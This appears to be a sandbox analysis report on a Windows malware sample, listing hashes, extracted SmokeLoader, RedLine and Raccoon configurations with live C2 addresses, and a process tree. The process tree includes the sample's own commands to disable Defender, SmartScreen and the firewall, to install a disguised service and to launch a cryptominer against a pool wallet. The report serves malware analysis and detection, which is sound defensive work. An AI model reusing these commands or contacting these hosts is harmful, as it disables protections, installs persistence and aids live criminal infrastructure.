Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
45s -
max time network
131s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
26/09/2021, 23:36
Static task
static1
Behavioral task
behavioral1
Sample
28351e9cfaca470a9f99b2455b3f1354.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
28351e9cfaca470a9f99b2455b3f1354.exe
Resource
win10v20210408
General
-
Target
28351e9cfaca470a9f99b2455b3f1354.exe
-
Size
134KB
-
MD5
28351e9cfaca470a9f99b2455b3f1354
-
SHA1
3546e2d0d5732538a0bb565d410f5ca1de9c3416
-
SHA256
11b4633345982ace9d710465450941598b2f9289f0438c358fa79eb8eaf680c3
-
SHA512
2314aa8caf12dd0a730106b3fd6663bf80f8cc798956aef55eeb238d640b11f7a4afafb8f87293df7b6ece96afd4dc9002dfeacb6ecdca5a2296ada2826f4897
Malware Config
Extracted
smokeloader
2020
http://naghenrietti1.top/
http://kimballiett2.top/
http://xadriettany3.top/
http://jebeccallis4.top/
http://nityanneron5.top/
http://umayaniela6.top/
http://lynettaram7.top/
http://sadineyalas8.top/
http://geenaldencia9.top/
http://aradysiusep10.top/
Extracted
redline
Denis
45.147.197.123:31820
Extracted
raccoon
5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4
-
url4cnc
https://t.me/agrybirdsgamerept
Extracted
redline
Bliss
185.237.98.178:62607
Extracted
redline
karma
94.103.9.133:39323
Signatures
-
Generic Chinese Botnet
A botnet originating from China which is currently unnamed publicly.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral1/files/0x00060000000125b7-72.dat family_redline behavioral1/files/0x00060000000125b7-74.dat family_redline behavioral1/memory/1584-145-0x0000000001F10000-0x0000000001F33000-memory.dmp family_redline behavioral1/memory/1584-146-0x0000000002110000-0x0000000002132000-memory.dmp family_redline behavioral1/memory/1796-149-0x0000000001F70000-0x0000000001F8F000-memory.dmp family_redline behavioral1/memory/1796-151-0x0000000002140000-0x000000000215E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Chinese Botnet Payload 1 IoCs
resource yara_rule behavioral1/memory/1164-157-0x0000000010000000-0x0000000010018000-memory.dmp unk_chinese_botnet -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
pid Process 1496 23C5.exe 1232 2980.exe 596 2E71.exe 296 348A.exe 1104 397A.exe 1760 frysxdqy.exe -
Modifies Windows Firewall 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1268 Process not Found -
Loads dropped DLL 2 IoCs
pid Process 1268 Process not Found 1064 Process not Found -
resource yara_rule behavioral1/files/0x047400000000b53c-186.dat themida behavioral1/files/0x047400000000b53c-188.dat themida behavioral1/files/0x047400000000b53c-189.dat themida behavioral1/memory/2748-190-0x000000013F6D0000-0x0000000140034000-memory.dmp themida behavioral1/files/0x047400000000b53c-198.dat themida behavioral1/files/0x0005000000013294-200.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1044 set thread context of 2028 1044 28351e9cfaca470a9f99b2455b3f1354.exe 27 PID 1760 set thread context of 784 1760 frysxdqy.exe 50 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 28351e9cfaca470a9f99b2455b3f1354.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 28351e9cfaca470a9f99b2455b3f1354.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 28351e9cfaca470a9f99b2455b3f1354.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2028 28351e9cfaca470a9f99b2455b3f1354.exe 2028 28351e9cfaca470a9f99b2455b3f1354.exe 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2028 28351e9cfaca470a9f99b2455b3f1354.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeShutdownPrivilege 1268 Process not Found Token: SeShutdownPrivilege 1268 Process not Found Token: SeShutdownPrivilege 1268 Process not Found Token: SeDebugPrivilege 1104 397A.exe Token: SeShutdownPrivilege 1268 Process not Found Token: SeDebugPrivilege 1228 powershell.exe Token: SeDebugPrivilege 296 348A.exe Token: SeDebugPrivilege 288 powershell.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 1044 wrote to memory of 2028 1044 28351e9cfaca470a9f99b2455b3f1354.exe 27 PID 1044 wrote to memory of 2028 1044 28351e9cfaca470a9f99b2455b3f1354.exe 27 PID 1044 wrote to memory of 2028 1044 28351e9cfaca470a9f99b2455b3f1354.exe 27 PID 1044 wrote to memory of 2028 1044 28351e9cfaca470a9f99b2455b3f1354.exe 27 PID 1044 wrote to memory of 2028 1044 28351e9cfaca470a9f99b2455b3f1354.exe 27 PID 1044 wrote to memory of 2028 1044 28351e9cfaca470a9f99b2455b3f1354.exe 27 PID 1044 wrote to memory of 2028 1044 28351e9cfaca470a9f99b2455b3f1354.exe 27 PID 1268 wrote to memory of 1496 1268 Process not Found 28 PID 1268 wrote to memory of 1496 1268 Process not Found 28 PID 1268 wrote to memory of 1496 1268 Process not Found 28 PID 1268 wrote to memory of 1232 1268 Process not Found 29 PID 1268 wrote to memory of 1232 1268 Process not Found 29 PID 1268 wrote to memory of 1232 1268 Process not Found 29 PID 1268 wrote to memory of 1232 1268 Process not Found 29 PID 1268 wrote to memory of 596 1268 Process not Found 30 PID 1268 wrote to memory of 596 1268 Process not Found 30 PID 1268 wrote to memory of 596 1268 Process not Found 30 PID 1268 wrote to memory of 596 1268 Process not Found 30 PID 1268 wrote to memory of 296 1268 Process not Found 31 PID 1268 wrote to memory of 296 1268 Process not Found 31 PID 1268 wrote to memory of 296 1268 Process not Found 31 PID 1268 wrote to memory of 296 1268 Process not Found 31 PID 1232 wrote to memory of 1464 1232 2980.exe 32 PID 1232 wrote to memory of 1464 1232 2980.exe 32 PID 1232 wrote to memory of 1464 1232 2980.exe 32 PID 1232 wrote to memory of 1464 1232 2980.exe 32 PID 1232 wrote to memory of 1176 1232 2980.exe 35 PID 1232 wrote to memory of 1176 1232 2980.exe 35 PID 1232 wrote to memory of 1176 1232 2980.exe 35 PID 1232 wrote to memory of 1176 1232 2980.exe 35 PID 1232 wrote to memory of 432 1232 2980.exe 37 PID 1232 wrote to memory of 432 1232 2980.exe 37 PID 1232 wrote to memory of 432 1232 2980.exe 37 PID 1232 wrote to memory of 432 1232 2980.exe 37 PID 1268 wrote to memory of 1104 1268 Process not Found 38 PID 1268 wrote to memory of 1104 1268 Process not Found 38 PID 1268 wrote to memory of 1104 1268 Process not Found 38 PID 1104 wrote to memory of 1228 1104 397A.exe 42 PID 1104 wrote to memory of 1228 1104 397A.exe 42 PID 1104 wrote to memory of 1228 1104 397A.exe 42 PID 1232 wrote to memory of 1648 1232 2980.exe 41 PID 1232 wrote to memory of 1648 1232 2980.exe 41 PID 1232 wrote to memory of 1648 1232 2980.exe 41 PID 1232 wrote to memory of 1648 1232 2980.exe 41 PID 1232 wrote to memory of 1044 1232 2980.exe 45 PID 1232 wrote to memory of 1044 1232 2980.exe 45 PID 1232 wrote to memory of 1044 1232 2980.exe 45 PID 1232 wrote to memory of 1044 1232 2980.exe 45 PID 1232 wrote to memory of 292 1232 2980.exe 47 PID 1232 wrote to memory of 292 1232 2980.exe 47 PID 1232 wrote to memory of 292 1232 2980.exe 47 PID 1232 wrote to memory of 292 1232 2980.exe 47 PID 1760 wrote to memory of 784 1760 frysxdqy.exe 50 PID 1760 wrote to memory of 784 1760 frysxdqy.exe 50 PID 1760 wrote to memory of 784 1760 frysxdqy.exe 50 PID 1760 wrote to memory of 784 1760 frysxdqy.exe 50 PID 1760 wrote to memory of 784 1760 frysxdqy.exe 50 PID 1760 wrote to memory of 784 1760 frysxdqy.exe 50 PID 1104 wrote to memory of 288 1104 397A.exe 51 PID 1104 wrote to memory of 288 1104 397A.exe 51 PID 1104 wrote to memory of 288 1104 397A.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\23C5.exeC:\Users\Admin\AppData\Local\Temp\23C5.exe1⤵
- Executes dropped EXE
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe"C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe"2⤵PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe"C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe"2⤵PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\fbf.exe"C:\Users\Admin\AppData\Local\Temp\fbf.exe"2⤵PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\2980.exeC:\Users\Admin\AppData\Local\Temp\2980.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qqmksfsk\2⤵PID:1464
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\frysxdqy.exe" C:\Windows\SysWOW64\qqmksfsk\2⤵PID:1176
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create qqmksfsk binPath= "C:\Windows\SysWOW64\qqmksfsk\frysxdqy.exe /d\"C:\Users\Admin\AppData\Local\Temp\2980.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:432
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description qqmksfsk "wifi internet conection"2⤵PID:1648
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start qqmksfsk2⤵PID:1044
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:292
-
-
C:\Users\Admin\AppData\Local\Temp\2E71.exeC:\Users\Admin\AppData\Local\Temp\2E71.exe1⤵
- Executes dropped EXE
PID:596
-
C:\Users\Admin\AppData\Local\Temp\348A.exeC:\Users\Admin\AppData\Local\Temp\348A.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:296 -
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"2⤵PID:2748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(exit)3⤵PID:1012
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off4⤵PID:2252
-
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe4⤵PID:2244
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe5⤵PID:1820
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe6⤵PID:292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"7⤵PID:2556
-
-
-
-
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:2272
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:2292
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:2432
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:1916
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:2608
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:848
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:2760
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:1304
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth3⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\397A.exeC:\Users\Admin\AppData\Local\Temp\397A.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute facebook.com2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com2⤵
- Suspicious use of AdjustPrivilegeToken
PID:288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute google.com2⤵PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute bing.com2⤵PID:1224
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Mcmyxcl.vbs"2⤵PID:2220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\putty.exe'3⤵PID:2276
-
-
-
C:\Users\Admin\AppData\Local\Temp\397A.exeC:\Users\Admin\AppData\Local\Temp\397A.exe2⤵PID:2472
-
-
C:\Windows\SysWOW64\qqmksfsk\frysxdqy.exeC:\Windows\SysWOW64\qqmksfsk\frysxdqy.exe /d"C:\Users\Admin\AppData\Local\Temp\2980.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:784
-
-
C:\Program Files (x86)\Microsoft Ouigga\Uuuocai.exe"C:\Program Files (x86)\Microsoft Ouigga\Uuuocai.exe"1⤵PID:1768
-
C:\Program Files (x86)\Microsoft Ouigga\Uuuocai.exe"C:\Program Files (x86)\Microsoft Ouigga\Uuuocai.exe" Win72⤵PID:2588
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210926233823.log C:\Windows\Logs\CBS\CbsPersist_20210926233823.cab1⤵PID:2484